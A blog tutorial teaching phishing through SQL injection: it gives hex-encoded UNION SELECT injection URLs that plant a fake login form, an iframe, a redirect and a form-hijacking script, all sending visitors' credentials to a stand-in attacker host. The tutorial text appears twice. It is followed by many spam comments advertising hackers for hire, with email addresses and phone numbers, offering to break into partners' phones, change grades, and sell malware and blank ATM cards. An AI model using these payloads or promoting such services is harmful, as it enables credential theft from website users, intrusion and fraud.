Welcome to my yet another tutorial related to SQLi, this time as the title say it all we are going to do phishing with URL spoofing using SQL injection vulnerabilty. For those who have not read the basics of SQL injection i suggest you to go and read N00bz guide to SQL injection.
If you are new to phishing i let me explain, phishing is a attack where an attacker fool the user to enter his secret credentials which are sent to him using any specially crafted page or application etc.
The Concept:
We are going to inject our payload into the SQL injection and add some extra code to the webpage just as we did in XSS. If you have not read XSS with SQL Injection Tutorial then read that for a better understanding.
Approaches we can use to Achieve it.
1. Finding the Vulnrability.
2. Preparing the Injectable Query.
3. Inject HTML Coded form into Website (For n00bz like me)
4. Injection Iframe into the Website
5. Redirect user to Your Fake Page (URL will be changed)
6. Inject a javascript to change Current Login Form (For l33ts like my Freind d3c0mp!l3R)
Finding the Vulnerability, Preparing the Injectable query all goes in the Basic SQL injection. Read them before you continue.
I suppose you have read them all.
So lets continue
3. Inject HTML Coded form into Website
I assume you read the above tutorials so we can for example take a website and lets say the 3rd column gets printed on the webpage as output. So we will inject our payload into it. To make things simple we will encode our payload into hex.
Our Payload
Hex Encoded value:
Injecting our payload:
The above url will output the our payload into the Website. And the user will see a form into the website, in which if he login the credentials will be sent to the Attacker.
4. Injection Iframe into the Website
This time we will inject an iframe in the website which makes the payload small and we can make the login look much better in this way.
Our Payload
Hex Encoded value
Injecting our payload:
The above url will output the our payload into the Website. And the user will see a form into the website, in which if he login the credentials will be sent to the Attacker.
5. Redirect user to Your Fake Page
This time we will inject javascript in the website which will redirect the user to our fakepage.
Our Payload
Injecting our payload:
The above url will inject the javascript into the page which will redirect user to our fakepage, in which if he login the credentials will be sent to the Attacker. The drawback it have is the URL spoofing part. Which we will cover in the next attack.
6. Inject a javascript to change Current Login Form
In this attack we will inject javascript in the website which will change the action of current login page in the site to our fake login page link.
Our Payload
Injecting our payload:
The above url will inject the javascript into the page which will send the users credentials logged into real page to our fakepage.
Enjoy Hacking with 1n51d3H4ck3r1337.
If you are new to phishing i let me explain, phishing is a attack where an attacker fool the user to enter his secret credentials which are sent to him using any specially crafted page or application etc.
The Concept:
We are going to inject our payload into the SQL injection and add some extra code to the webpage just as we did in XSS. If you have not read XSS with SQL Injection Tutorial then read that for a better understanding.
Approaches we can use to Achieve it.
1. Finding the Vulnrability.
2. Preparing the Injectable Query.
3. Inject HTML Coded form into Website (For n00bz like me)
4. Injection Iframe into the Website
5. Redirect user to Your Fake Page (URL will be changed)
6. Inject a javascript to change Current Login Form (For l33ts like my Freind d3c0mp!l3R)
Finding the Vulnerability, Preparing the Injectable query all goes in the Basic SQL injection. Read them before you continue.
I suppose you have read them all.
So lets continue
3. Inject HTML Coded form into Website
I assume you read the above tutorials so we can for example take a website and lets say the 3rd column gets printed on the webpage as output. So we will inject our payload into it. To make things simple we will encode our payload into hex.
Our Payload
<form action=http://evilsite.com/get_it.php method="POST">
Username : <input type="text" name="username"><br>
Password :<input type="text" name="password">
<input type="submit">
</form>
<iframe height=0 width=0>
Hex Encoded value:
0x3c666f726d20616374696f6e3d687474703a2f2f6576696c736974652e636f6d2f6765745f69742e706870206d6574686f643d22504f5354223e557365726e616d65203a203c696e70757420747970653d227465787422206e616d653d22757365726e616d65223e3c62723e50617373776f7264203a3c696e70757420747970653d227465787422206e616d653d2270617373776f7264223e3c696e70757420747970653d227375626d6974223e3c2f666f726d3e3c696672616d65206865696768743d302077696474683d303e
Injecting our payload:
http://exploitable-web.com/link.php?id=-1' union select 1,2,0x3c666f726d20616374696f6e3d687474703a2f2f6576696c736974652e636f6d2f6765745f69742e706870206d6574686f643d22504f5354223e557365726e616d65203a203c696e70757420747970653d227465787422206e616d653d22757365726e616d65223e3c62723e50617373776f7264203a3c696e70757420747970653d227465787422206e616d653d2270617373776f7264223e3c696e70757420747970653d227375626d6974223e3c2f666f726d3e3c696672616d65206865696768743d302077696474683d303e,4--
The above url will output the our payload into the Website. And the user will see a form into the website, in which if he login the credentials will be sent to the Attacker.
4. Injection Iframe into the Website
This time we will inject an iframe in the website which makes the payload small and we can make the login look much better in this way.
Our Payload
<br><iframe src="http://www.evilsite.com/fakepage.php" height=300 width=300 frameBorder="0" scrolling="no"></iframe>
Hex Encoded value
0x3c62723e3c696672616d65207372633d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e70687022206865696768743d3330302077696474683d333030206672616d65426f726465723d223022207363726f6c6c696e673d226e6f223e3c2f696672616d653e
Injecting our payload:
http://exploitable-web.com/link.php?id=-1' union select 1,2,0x3c62723e3c696672616d65207372633d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e70687022206865696768743d3330302077696474683d333030206672616d65426f726465723d223022207363726f6c6c696e673d226e6f223e3c2f696672616d653e,4--
The above url will output the our payload into the Website. And the user will see a form into the website, in which if he login the credentials will be sent to the Attacker.
5. Redirect user to Your Fake Page
This time we will inject javascript in the website which will redirect the user to our fakepage.
Our Payload
<script>window.location.href="http://www.evilsite.com/fakepage.php"</script>Hex Encoded value
0x3c7363726970743e77696e646f772e6c6f636174696f6e2e687265663d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e706870223c2f7363726970743e
Injecting our payload:
http://exploitable-web.com/link.php?id=-1' union select 1,2,0x3c7363726970743e77696e646f772e6c6f636174696f6e2e687265663d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e706870223c2f7363726970743e,4--
The above url will inject the javascript into the page which will redirect user to our fakepage, in which if he login the credentials will be sent to the Attacker. The drawback it have is the URL spoofing part. Which we will cover in the next attack.
6. Inject a javascript to change Current Login Form
In this attack we will inject javascript in the website which will change the action of current login page in the site to our fake login page link.
Our Payload
<script>document.getElementsByTagName("form")[0].action="http://www.evilsite.com/fakepage.php"</script>
Hex Encoded value0x3c7363726970743e646f63756d656e742e676574456c656d656e747342795461674e616d652822666f726d22295b305d2e616374696f6e3d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e706870223c2f7363726970743e
Injecting our payload:
http://exploitable-web.com/link.php?id=-1' union select 1,2,0x3c7363726970743e646f63756d656e742e676574456c656d656e747342795461674e616d652822666f726d22295b305d2e616374696f6e3d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e706870223c2f7363726970743e,4--
The above url will inject the javascript into the page which will send the users credentials logged into real page to our fakepage.
Enjoy Hacking with 1n51d3H4ck3r1337.
i have been a victim of wicked people who call themselves hackers. i want to inform you that almost everyone here are all scams. just last week i paid over 300GBP to a hacker that claim he is good, up to this momemt ive not heard from him. i was at the verge of loosing my job, just monday i was surfing the internet when i saw this email cryptocyberhacker@gmail.com at all conner stating that he is good and legit that he will not reap you off. i had to give him a chance, people i am not here to praise anybody but i am here to tell you that mr Daniel is real and legit, today i am a happy man, my grade has been change and he is the best. i urge you guys to contact him on this email cryptocyberhacker@gmail.com, he is real and he is the best. i will go tell the world what this man has done for me. God is my witness if i am lying. Mr daniel is a God sent to help correct out mistake. just had to put this out there for those who really need someone goodcontact him on his email . cryptocyberhacker@gmail.com
ReplyDeleteHello everyone, i would like to share my story with you all because i believe it would be of help.I just got over my divorce tussle that went on for almost two years November 2017,i filed for divorce because i knew she was cheating but i had no evidence to back up my claim.Long story cut short i decided to check online if i could have access to another person"s phone without touching or installing any software on it and i met this guy i was very shocked because i got all info including deleted ones.If you would like to get in touch with him,send him a mail via wisetchhacker@gmail.com
ReplyDeleteHello everyone, i would like to share my story with you all because i believe it would be of help.I just got over my divorce tussle that went on for almost two years November 2017,i filed for divorce because i knew she was cheating but i had no evidence to back up my claim.Long story cut short i decided to check online if i could have access to another person"s phone without touching or installing any software on it and i met this guy i was very shocked because i got all info including deleted ones.If you would like to get in touch with him,send him a mail via wisetchhacker@gmail.com
ReplyDeleteAre you in need of a hacker in any area of your life??? then you can contact: WISETECHHACKER@GMAIL.COM He will help you at affordable prices, He offer services like -hack into your cheating partner's phone(whatsapp,bbm.gmail,icloud,facebook and others) -Sales of Blank ATM cards. -hack into email accounts and trace email location -all social media accounts, -school database to clear or change grades, -Retrieval of lost file/documents -DUIs -company records and systems, -Bank accounts,Paypal accounts, bitcoins accounts, -Credit cards hacker -Credit score hack -Monitor any phone and email address -Websites hacking, pentesting. -IP addresses and people tracking. -Hacking courses and classes. He services are the best on the market and 100% security and discreet work is guaranteed.....
ReplyDelete===========================
ReplyDeletei always use just one hacker, he has been reliable and ive used him for a year now, he helped change the grades of my friends and i and helped clear my cousin's credit card debts, the next project his working on for me is clearing my student loan debts, his already done the same for my friend-email him now cybergods116@gmail.com and thank me latter,
Since i lost $1200 to fake hackers been searching for the right one till i met cybergods116@gmail.com. He's totally the word hack.Does from yahoo,Facebook,gmail,Hotmail,aol,twitter,Instagram,snapchat,bank jobs and credit card tops, Paypal acct,blank a.t.m cards,update school grades. I am not here to advertise but tell you my experience...He's kinda picky so make mention of the reference. howard referred you. don't forget to thank me later
ReplyDelete
ReplyDeleteBeware of scammers i have been scammed 3 times because i was trying to know if my husband was cheating until i met this hacker named; (wisetechhacker@gmail.com) who helped me hack into my spouse phone for real this great hacker hacked into my spouse whats-app messages,Facebook messages.text messages,call logs,deleted text messages,bitcoin account and many more i was impressed with his job and he brought me results under 24 hours believe me he is real and his services are cheap and affordable.
HELLO, I FOUND A HACKER THAT IS ABOVE ALL OTHER HACKERS ON THE DEEP WEB. HE WAS PART OF A TEAM THAT HAD MADE HACKING HEADLINES IN THE PAST. HE HELPED HACKED INTO A WEBSITE DATABASE THAT WAS IMPORTANT TO ME SO I DECIDED TO MAKE HIM ACCESSIBLE TO YOU ALL.
ReplyDeleteHE SPECIALIZES IN DATABASE HACKS, CREDIT SCORE REPAIR, CRIMINAL RECORDS, DUIS, BANK ACCOUNT TRANSFERS ONLY. HE ACCEPTS HIS PAYMENT BEFORE THE JOB AT ALL TIMES AND GETS THE JOB DONE.
CONTACT HIM VIA Anonymous00fileshacker@gmail.com, ONLY SERIOUS CLIENTS.
I almost fell for scam, until I met this my old time friend who is now retired from USA dark web work,she’s highly skilled in all types of hacking and I bet you’re safe with her. Contact her on cryptocyberhacker@gmail.com, whatsapp: +15188160274 You just try it and tell the sweet testimony like I am also,I told her I owe her a lot, and I have to pay her by letting people know her good works.
ReplyDeleteshe does all types of hacking according to what she told me, which includes Facebook, Snapchat,mail,Instagram.she also hacks phone, bitcoin address, western union to increase money, and CCTV,also iPhone and Icloud hacking, contact her and I bet,you’ll tell a success story, because she has never failed in all she did for me.
cryptocyberhacker@gmail.com, whatsapp: +15188160274 that’s her mail.
Hello Everyone,just want to share my experience on how I traded bitcoin with so many scammers on Instagram, until I met btclord15@gmail.com and her team, and how I got $4,500 with just $500. It is beyond eye opening. With her trading skills, I've had nothing but continuous success. Thanks alot @clara_george03. You can reach her on instagram
ReplyDelete@clara_george03
Please cease from contacting these fake hackers who ripp you off your money, no hacker will just ask for money first. i was ripped off allot of time because i needed to hack into myhusbandsfacebook and email, finally i got in contact with a friend in England who hired a man to do her private investigation on her man. she told mehe might also be able to do my work so i contacted cybergods116@gmail.com they helped me hack into my husbandsfacebook smoothly, hacked into his emails and cell phone.the sweetest of all is that he shows proof and doesnt collect payment first. he worksfirst then payment after, they chooses who they works for, mentioning my name would make him respond and treat you better as we are now close.Just tell him you are from CLARA. He also does so many other hacks like facebook, whatsapp, bank, credit card, just name it...
ReplyDelete
ReplyDeleteI am so fortunate to have attempted contacting hack.truth and his team These hackers has successfully hacked my partner's iPhone so that I can have access to every deleted messages on WhatsApp, Facebook and email. I really appreciate you my hackers and thanks to the people that recommended them to me contact them via. hack.truth77@gmail.com
Hello everyone, You don't have to go through stress searching about hackers for help, I know because I have be in that same situation, So I'm here to recommend (fasttechhacker) he is an experience internet hacker. I contacted him when i needed to make some research on my cheating fiancé phone, and it was a good successful job he did for me as provided me a spy app emulator as I was able to monitor my fiancé location, with access to view call logs, messages, WhatsApp chats, Facebook, Instagram, email. If you need a reliable hacker for any hacking job, I guarantee everyone should reach him for help via email (fasttechhacker@gmail.com)
ReplyDeleteWE ARE a cyber ethiical hack squad... WE SPECIALIZE IN CRACKING-CRYPTING-HASHING-DOXXING-DDOS-RATTING-CODING-SPAMMING-PHISHING. WE ALSO SELL ALL SORTS OF CUSTOM CODED SOFTWARE/MALWARES FROM RATS AND BOTS TO RANSOMWARE, BITCOIN STEALERS, AND BANKING TROJANS.
ReplyDeleteDISCRETE HACKING SERVICES-WE CAN HACK INTO ACCOUNTS-FACEBOOK, GMAIL, HOTMAIL ETC. WE CAN ACCESS DEVICES-COMPUTERS, PHONES, TABLETS ETC. WE CAN FIND OUT INFORMATION ON TARGETS AND BUSINESSES WE CAN ACCESS WEBSITES DATABASES, NETWORKS, DDOS ATTACKS, WE CAN DOX MOST PEOPLE
MALWARE: RATS, RANSOMWARE, BOTNETS, POS MALWARE, TROJANS.
FREE INFORMATION IS USELESS INFORMATION. THAT IS WHY YOU PAY FOR SCHOOL ... Email us via cyberethiicalhacker AT gmail DOT com
i was in a bit of some really embarrassing cyber issues which led me to meeting some scammers as well but my will to solve my issue eventually paid off when i met LISA MORGAN, her work rate,professionalism and discretion she's top-class. Hit her up at Hacker.fixtruth88@gmail.com, or whatsapp +447422853934 She's kinda picky though so make mention of the reference. Tell him i lawson referred you.... You're welcome
ReplyDelete